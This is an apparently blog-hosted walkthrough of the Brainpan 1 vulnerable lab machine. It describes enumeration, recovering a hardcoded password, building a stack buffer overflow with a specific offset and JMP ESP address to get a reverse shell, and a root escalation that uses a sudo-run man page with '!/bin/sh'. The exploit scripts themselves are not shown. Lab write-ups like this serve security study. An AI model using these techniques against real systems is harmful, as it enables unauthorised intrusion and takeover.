Sunday, September 2, 2018

Brainpan


BRAINPAN 1

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine Brainpan 1.

- Brainpan 1 can be downloaded from here:

https://www.vulnhub.com/entry/brainpan-1,51/

- Once downloaded and imported with VMWare:





2 - ENUMERATION

- netdiscover helps us to discover that Brainpan's IP is 192.168.1.26:





- Nmap finds two open ports: 9999/tcp and 10000/tcp:





- Connecting with the browser to port 10000:





- dirb scans the web server and finds the folder /bin:





- Connecting to /bin with the browser there is an executable called brainpan.exe:




- Downloading brainpan.exe to Kali:





- Let's notice that it is a Windows executable file:





- Searching for strings inside brainpan.exe there are some functions prone to suffer from Buffer Overflow attacks:


..............

...............



- Connecting with the browser to the other open port 9999:




- Let's connect again to port 9999, now with netcat. Entering a random password the acces is denied:






3 - EXPLOITATION

3.1 - ANALYZING BRAINPAN.EXE AT WINDOWS 10 WITH IMMUNITY DEBUGGER

- With the purpose of analyzing in deep the executable brainpan.exe let's move the file to a Windows environment like a Windows 10 machine:










3.1.1 - Finding the password

- Opening and running brainpan.exe with Immunity debugger it is pretty obvious that the string shitstorm is compared with other string using the function strcmp:








- This leads us to guess that shitstorm can be the password to enter the application:




- Our guess was correct because now the access is granted.


3.1.2 - Buffer overflow 

- As we discovered at the Enumeration step brainpan.exe contains some strings like strcpy prone to suffer from a Buffer Overflow exploitation.

- First of all, let's create a Python script to cast a long list of "A"s over brainpan.exe:






- Giving execution permissions to exploit_windows.py:




- Opening and running brainpan.exe with Immunity Debugger:




- Launching the exploit over the Windows 10 machine:





- The EIP and the stack are overwritten with "A"s:








- Creating a pattern with lenght 1000 and inserting it at the exploit:








- Restarting brainpan.exe with Immunity Debugger and launching the exploit:




-  The EIP is overwritten with 35724134:










- Finding an offset of 524 for 35724134:





- Now, let's redo the script in this way:






- Restarting brainpan.exe with Immunity Debugger and launching the last version of the exploit:




- The result is that the EIP is overwritten witn BBBB, as expected:









- Looking for a command JMP ESP, we find it at the address 311712F3:






- The address  311712F3 should replace the string BBBB where the EIP is overflown, entered with Little Endian formart: \xF3\x12\x17\x31

- Creating a shellcode to achieve a reverse shell at Windows 10 machine on port 4444:





- Also, after the JMP ESP command a bunch of NOP instructions must be used to make it easier the execution of the shellcode.

- Joining everything at the script exploit_windows.py:






- Setting a listening session with Netcat:




- Launching the exploit for last time:




- The exploit is successful and we have at Kali a remote shell from Windows 10:




- Output from Immunity Debugger:





3.2 - EXPLOITING BRAINPAN 

- Now, let's change the former Windows shellcode with another one for Linux:




- Inserting the shellcode for Linux into a new exploiting script (just changing the shellcode):






- Giving execution permissions:




- Setting a listening session with netcat on port 5555:




- Launching the exploit against Brainpan:





- The exploit is successful because a low privilege shell is achieved:




- Improving the shellcode:




4 - PRIVILEGE ESCALATION

- So far we have a limited shell:




- Checking user puck's sudoer permissions, we discover that he is able to run as a root without password the command anansi_util:





- Let's run it:




- There are 3 options, it seems that the most interesting could be manual [command], what invites to enter a command, like for instance let's try pwd:








- The result is the man page for the command pwd

- However, because the command has been executed as a root, and remembering that man allows to execute additional inline commands starting with !, let's try !/bin/sh:






- Great, eventually we have a root shell:




- The purpose of executing inline commands from man with ! is just to test those commands without exiting the man page. 

- In our case it has been of great help for achieving a quick and easy Privilege Escalation, due to the fact that man has been executed with root privileges.5 - CAPTURING THE FLAG

- We find the flag by reading b.txt: